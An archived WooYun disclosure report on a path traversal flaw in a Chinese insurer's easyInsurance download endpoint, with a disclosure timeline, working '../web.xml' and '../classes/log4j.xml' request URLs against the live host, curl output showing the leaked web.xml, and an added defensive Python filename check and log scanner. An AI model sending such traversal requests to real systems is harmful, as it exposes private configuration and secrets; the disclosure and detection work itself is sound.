WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2015-09-21: Details reported to the vendor, awaiting vendor response
2015-09-21: Vendor has confirmed; details disclosed to the vendor only
2015-10-01: Details disclosed to core white hats and relevant domain experts
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to intern white hats
2015-11-05: Details disclosed to the public
1. This vulnerability was also found by accident; I was not really going after this one.
1. web.xml: http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml
2. log4j.xml: http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml
curl -vv 'http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml'
* Hostname was NOT found in DNS cache
*   Trying 111.203.203.13...
* Connected to kybpc.chexian.sinosig.com (111.203.203.13) port 80 (#0)
> GET /easyInsurance/html5/downLoad.do?fileName=../web.xml HTTP/1.1
> User-Agent: curl/7.37.1
> Host: kybpc.chexian.sinosig.com
> Accept: */*
>
< HTTP/1.1 200 OK
* Server Apache-Coyote/1.1 is not blacklisted
< Server: Apache-Coyote/1.1
< X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
< Content-Disposition: attachment;filename=../web.xml
< Content-Type: application/xml;charset=UTF-8
< Content-Language: zh-CN
< Transfer-Encoding: chunked
< Date: Mon, 21 Sep 2015 04:49:24 GMT
<
<?xml version="1.0" encoding="utf-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.4" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
  <!-- Path of the Spring ApplicationContext configuration files; wildcards allowed, multiple paths separated by commas. Used by the Spring context loader below -->
  <context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value>classpath*:spring/*.xml</param-value>
  </context-param>
  <context-param>
    <param-name>javax.servlet.jsp.jstl.fmt.localizationContext</param-name>
    <param-value>i18n/messages</param-value>
  </context-param>
  <context-param>
    <param-name>log4jConfigLocation</param-name>
    <param-value>/WEB-INF/classes/log4j.xml</param-value>
  </context-param>
  <context-param>
    <param-name>log4jRefreshInterval</param-name>
    <param-value>5</param-value>
  </context-param>
  <!-- Server-side cache type -->
  <context-param>
    <param-name>cacheType</param-name>
    <param-value>ehcache</param-value>
  </context-param>
  <!-- The well-known Character Encoding filter -->
  <filter>
    <filter-name>encodingFilter</filter-name>
    <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>
    <init-param>
      <param-name>encoding</param-name>
      <param-value>UTF-8</param-value>
    </init-param>
  </filter>
  <!-- GZIP compression filter for page assets -->
  <filter>
    <filter-name>compressFilter</filter-name>
    <filter-class>ins.framework.web.CompressFilter</filter-class>
    <init-param>
      <param-name>ignoreKey</param-name>
      <param-value>.js,.css,.gif,.jpg,.vbs</param-value>
    </init-param>
  </filter>
  <filter>
    <filter-name>struts2</filter-name>
    <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
  </filter>
  <filter>
    <filter-name>SessionFilter</filter-name>
    <filter-class>com.sinosoft.easyInsurance.common.web.SessionFilter</filter-class>
  </filter>
  <filter>
    <filter-name>MenuDisabledFilter</filter-name>
    <filter-class>com.sinosoft.easyInsurance.common.web.MenuDisabledFilter</filter-class>
  </filter>
  <!-- Cache Filter -->
  <filter>
    <filter-name>CacheFilter</filter-name>
    <filter-class>ins.framework.web.CacheFilter</filter-class>
    <init-param>
      <param-name>expireTime</param-name>
      <param-value>300</param-value>
    </init-param>
  </filter>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.js</url-pattern></filter-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.css</url-pattern></filter-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.gif</url-pattern></filter-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.jpg</url-pattern></filter-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.vbs</url-pattern></filter-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>*.html</url-pattern></filter-mapping>
  <filter-mapping><filter-name>encodingFilter</filter-name><url-pattern>/*</url-pattern></filter-mapping>
  <filter-mapping><filter-name>encodingFilter</filter-name><url-pattern>*.do</url-pattern></filter-mapping>
  <!-- GZIP compression filter for page assets, reduces network bandwidth -->
  <filter-mapping><filter-name>compressFilter</filter-name><url-pattern>*.js</url-pattern></filter-mapping>
  <filter-mapping><filter-name>MenuDisabledFilter</filter-name><url-pattern>*.do</url-pattern></filter-mapping>
  <filter-mapping><filter-name>struts2</filter-name><url-pattern>*.do</url-pattern></filter-mapping>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>*.jsp</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
    <dispatcher>INCLUDE</dispatcher>
  </filter-mapping>
  <filter-mapping><filter-name>struts2</filter-name><url-pattern>/struts/*</url-pattern></filter-mapping>
  <filter-mapping><filter-name>SessionFilter</filter-name><url-pattern>*.do</url-pattern></filter-mapping>
  <filter-mapping><filter-name>SessionFilter</filter-name><url-pattern>*.jsp</url-pattern></filter-mapping>
  <filter-mapping><filter-name>SessionFilter</filter-name><url-pattern>/*Servlet</url-pattern></filter-mapping>
  <!-- Logging -->
  <listener>
    <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
  </listener>
  <!-- Session Log Listener loading
  <listener>
    <listener-class>ins.common.web.ClaimHttpSessionListener</listener-class>
  </listener>
  -->
  <!-- Spring ApplicationContext loading -->
  <listener>
    <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
  </listener>
  <listener>
    <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class>
  </listener>
  <!-- Spring: flush the Introspector to prevent memory leaks -->
  <listener>
    <listener-class>org.springframework.web.util.IntrospectorCleanupListener</listener-class>
  </listener>
  <!-- cacheManager server-side cache -->
  <listener>
    <listener-class>ins.framework.cache.CacheManagerInitListener</listener-class>
  </listener>
  <!-- requestCombo component merging -->
  <servlet>
    <servlet-name>RequestComboServlet</servlet-name>
    <servlet-class>ins.platform.requestcombo.RequestComboServlet</servlet-class>
    <init-param>
      <description>允许访问的URL前缀,避免源码泄漏风险</description>
      <param-name>validPrefix</param-name>
      <param-value>/widgets/</param-value>
    </init-param>
    <init-param>
      <description>是否开启服务端对js文件混淆压缩</description>
      <param-name>isCompress</param-name>
      <param-value>false</param-value>
    </init-param>
  </servlet>
  <servlet-mapping><servlet-name>RequestComboServlet</servlet-name><url-pattern>/requestCombo</url-pattern></servlet-mapping>
  <filter-mapping><filter-name>CacheFilter</filter-name><url-pattern>/requestCombo</url-pattern></filter-mapping>
  <filter-mapping><filter-name>compressFilter</filter-name><url-pattern>/requestCombo</url-pattern></filter-mapping>
  <!--
  <servlet>
    <display-name>Apache-Axis Servlet</display-name>
    <servlet-name>AxisServlet</servlet-name>
    <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
  </servlet>
  <servlet>
    <display-name>Axis Admin Servlet</display-name>
    <servlet-name>AdminServlet</servlet-name>
    <servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class>
    <load-on-startup>100</load-on-startup>
  </servlet>
  -->
  <servlet>
    <servlet-name>serviceFactoryInitServlet</servlet-name>
    <servlet-class>com.sinosoft.easyInsurance.common.web.ServiceFactoryInitServlet</servlet-class>
    <load-on-startup>3</load-on-startup>
  </servlet>
  <!--
  <servlet-mapping><servlet-name>AxisServlet</servlet-name><url-pattern>/servlet/AxisServlet</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>AxisServlet</servlet-name><url-pattern>*.jws</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>AxisServlet</servlet-name><url-pattern>/services/*</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>AdminServlet</servlet-name><url-pattern>/servlet/AdminServlet</url-pattern></servlet-mapping>
  -->
  <!-- Session timeout, in minutes -->
  <session-config>
    <session-timeout>60</session-timeout>
  </session-config>
  <mime-mapping>
    <extension>js</extension>
    <mime-type>text/javascript;charset=utf-8</mime-type>
  </mime-mapping>
  <mime-mapping>
    <extension>htm</extension>
    <mime-type>text/html;charset=utf-8</mime-type>
  </mime-mapping>
  <servlet>
    <servlet-name>allocatePushServlet</servlet-name>
    <servlet-class>com.sinosoft.easyInsurance.common.web.ProxyServlet</servlet-class>
    <!-- <load-on-startup>3</load-on-startup> -->
  </servlet>
  <servlet-mapping><servlet-name>allocatePushServlet</servlet-name><url-pattern>/allocatePushServlet</url-pattern></servlet-mapping>
</web-app>
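The request above succeeds because downLoad.do joins the raw fileName value onto its base directory and serves whatever results. Added here as an illustration, not code from the report or from the vendor's Java application: a Python version of the server-side check that would have refused fileName=../web.xml (the logic is the same in a servlet), plus a scan of access-log lines for requests that check would refuse. The download directory, the log lines and the client addresses are constructed for the example.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Directory the download endpoint is allowed to serve from (hypothetical path).
DOWNLOAD_ROOT = "/opt/jboss/server/default/deploy/easyInsurance.war/html5/downloads"

def resolve_download(file_name: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Hardened handling of a 'fileName' parameter: return the canonical path to
    serve, or None when the request must be refused. Two independent checks: the
    value must be a bare file name, and the resolved path must stay inside root
    (the second catches symlinks and anything the first misses)."""
    name = unquote(unquote(file_name))  # collapse single and double URL encoding
    if not name or name in (".", "..") or any(c in name for c in "/\\\0"):
        return None  # refuses '../web.xml', '..\\web.xml', '/etc/passwd', 'a/b.txt'
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

# Combined-format access log lines, constructed for this example (client IPs are
# documentation addresses); the first and third mirror the requests in the report.
ACCESS_LOG = """\
198.51.100.7 - - [21/Sep/2015:04:49:24 +0000] "GET /easyInsurance/html5/downLoad.do?fileName=../web.xml HTTP/1.1" 200 5821
198.51.100.8 - - [21/Sep/2015:04:50:01 +0000] "GET /easyInsurance/html5/downLoad.do?fileName=policy.pdf HTTP/1.1" 200 20480
198.51.100.7 - - [21/Sep/2015:04:51:13 +0000] "GET /easyInsurance/html5/downLoad.do?fileName=..%2Fclasses%2Flog4j.xml HTTP/1.1" 200 3310
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def find_traversal(log_text: str):
    """Flag every downLoad.do request whose fileName the hardened check would refuse.
    Returns a list of (source IP, timestamp, decoded fileName, status); a 200 on a
    flagged line means the file was actually served and the exposure needs triage."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "downLoad.do" not in m.group("path"):
            continue
        query = m.group("path").partition("?")[2]
        for pair in query.split("&"):
            key, sep, value = pair.partition("=")
            if sep and key == "fileName" and resolve_download(value) is None:
                hits.append((m.group("src"), m.group("ts"), unquote(unquote(value)), m.group("status")))
    return hits
```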
I will not dig any further.
Severity: Medium
Vulnerability rank: 6
Confirmed: 2015-09-21 14:23
Thanks for the submission
None yet